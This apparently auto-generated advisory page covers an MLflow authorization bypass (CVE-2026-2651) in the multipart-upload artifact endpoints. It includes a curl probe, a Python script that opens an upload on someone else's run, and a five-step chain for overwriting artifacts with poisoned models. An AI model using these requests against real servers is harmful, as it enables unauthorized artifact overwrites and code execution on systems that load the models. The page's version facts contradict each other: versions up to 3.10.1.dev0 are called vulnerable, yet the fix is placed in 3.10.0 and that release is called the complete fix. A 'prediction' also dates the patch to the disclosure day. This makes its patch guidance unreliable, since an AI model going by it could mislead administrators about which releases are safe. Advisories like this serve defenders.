Listen to this Post
A vulnerability in MLflow versions up to 3.10.1.dev0, tracked as CVE-2026-2651, allows unauthorized access to multipart upload (MPU) endpoints when the `–serve-artifacts` mode is enabled. The root cause lies in two authorization flaws that were introduced during the development of proxy artifact handling. First, the `_is_proxy_artifact_path` function, which determines if a path requires authentication, did not recognize any of the MPU endpoints (/mlflow-artifacts/mpu/) as proxy paths. Consequently, these endpoints were never routed through the authorization chain. Second, even if a request passed through, the `_get_proxy_artifact_validator` function lacked a mapping for the `POST` method, which is essential for MPU operations like create, complete, and abort.
With no resource-level permission checks, an attacker can craft direct requests to endpoints such as `POST /api/2.0/mlflow-artifacts/mpu/create/{experiment_id}/{run_id}/artifacts/{path}` to upload or replace artifacts belonging to other users. This bypass of authorization logic enables cross-user writes, which is a direct path to model supply chain poisoning. Since MLflow artifacts often contain serialized models, an attacker can insert malicious code, leading to arbitrary code execution on any system that later loads the compromised model.
The fix, introduced in version 3.10.0, adds two missing path prefixes (/mlflow-artifacts/mpu/) to the authorization path detection and correctly maps the `POST` method to the `validate_can_update_experiment_artifact_proxy` validator, ensuring all MPU operations require proper permissions.
DailyCVE Form:
Platform: MLflow Tracking
Version: ≤3.10.1.dev0
Vulnerability: Auth bypass (CWE-862)
Severity: Critical (CVSS 9.0)
Date: 2026-05-25
Prediction: Patch expected 2026-05-25
What Undercode Say:
Undercode Analytics has issued the following advisory. Use the following commands to verify and mitigate the vulnerability.
Bash Commands for Detection:
Check MLflow version and serve-artifacts status:
mlflow --version Look for versions <=3.10.1.dev0 ps aux | grep "mlflow server" | grep "serve-artifacts"
Test for unauthorized access to MPU endpoints:
Try to create an MPU upload session without authentication
curl -X POST "http://target-server:5000/api/2.0/mlflow-artifacts/mpu/create/1/run-id/artifacts/test" \
-H "Content-Type: application/json" \
-d '{"artifact_uri": "test"}'
A successful response (not 401/403) indicates vulnerability
Python Code Snippet for Exploit Verification:
import requests
target = "http://vulnerable-mlflow:5000"
run_id = "target-run-id"
experiment_id = "1"
Attempt to start a multipart upload for someone else's run
payload = {
"artifact_uri": "malicious_model",
"num_parts": 1
}
response = requests.post(
f"{target}/api/2.0/mlflow-artifacts/mpu/create/{experiment_id}/{run_id}/artifacts/pytorch_model.bin",
json=payload
)
if response.status_code == 200:
print(f"[!] VULNERABLE: Able to initiate MPU for run {run_id}")
else:
print(f"[-] Not vulnerable or protected: {response.status_code}")
Exploit
A remote attacker with network access to an MLflow instance running in `–serve-artifacts` mode can directly call the MPU endpoints without any permissions. The full exploit chain:
1. Enumerate existing runs by accessing the MLflow UI or API to find target `run_id` values.
2. Start a multipart upload for a target artifact path using POST /mlflow-artifacts/mpu/create/{experiment_id}/{run_id}/artifacts/{filename}.
3. Upload malicious parts using `PUT` requests to the signed URLs returned from the create call.
4. Complete the upload via POST /mlflow-artifacts/mpu/complete/{experiment_id}/{run_id}/artifacts/{filename}, which finalizes the artifact overwrite.
5. Trigger code execution when a downstream system loads the poisoned model (e.g., via mlflow.pyfunc.load_model()).
No authentication token, API key, or user role is required, as the authorization logic is entirely bypassed.
Protection
- Upgrade to MLflow version 3.10.0 or later. This is the only complete fix.
- Disable the `–serve-artifacts` flag if not required for your deployment. This removes the vulnerable endpoint from the attack surface.
- Restrict network access to the MLflow tracking server, allowing connections only from trusted IP addresses or through a VPN.
- Enable request logging and monitoring for the `/mlflow-artifacts/mpu/` paths to detect unauthorized access attempts.
- Use a reverse proxy (e.g., Nginx) with strong authentication rules in front of the MLflow server as a defense-in-depth measure.
- Regularly audit model artifacts stored in the MLflow registry for unexpected or unauthorized changes.
Impact
- Unavailability of model integrity: Attackers can arbitrarily overwrite or delete artifacts belonging to other users, leading to loss of legitimate models and data.
- Model supply chain poisoning: Malicious code injected into serialized models (e.g., PyTorch, TensorFlow, or scikit-learn) can be executed on any production system that later loads the artifact.
- Remote code execution: Loading a poisoned model can lead to full control of the inference or training environment, exposing sensitive data and allowing further lateral movement.
- Privilege escalation: The bypass completely erodes any tenant isolation in multi-user MLflow deployments, enabling any user (or unauthenticated attacker) to act as any other user.
- Widespread AI application compromise: Because MLflow is commonly used in MLOps pipelines, this vulnerability can have cascading effects across model training, validation, and serving stages.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
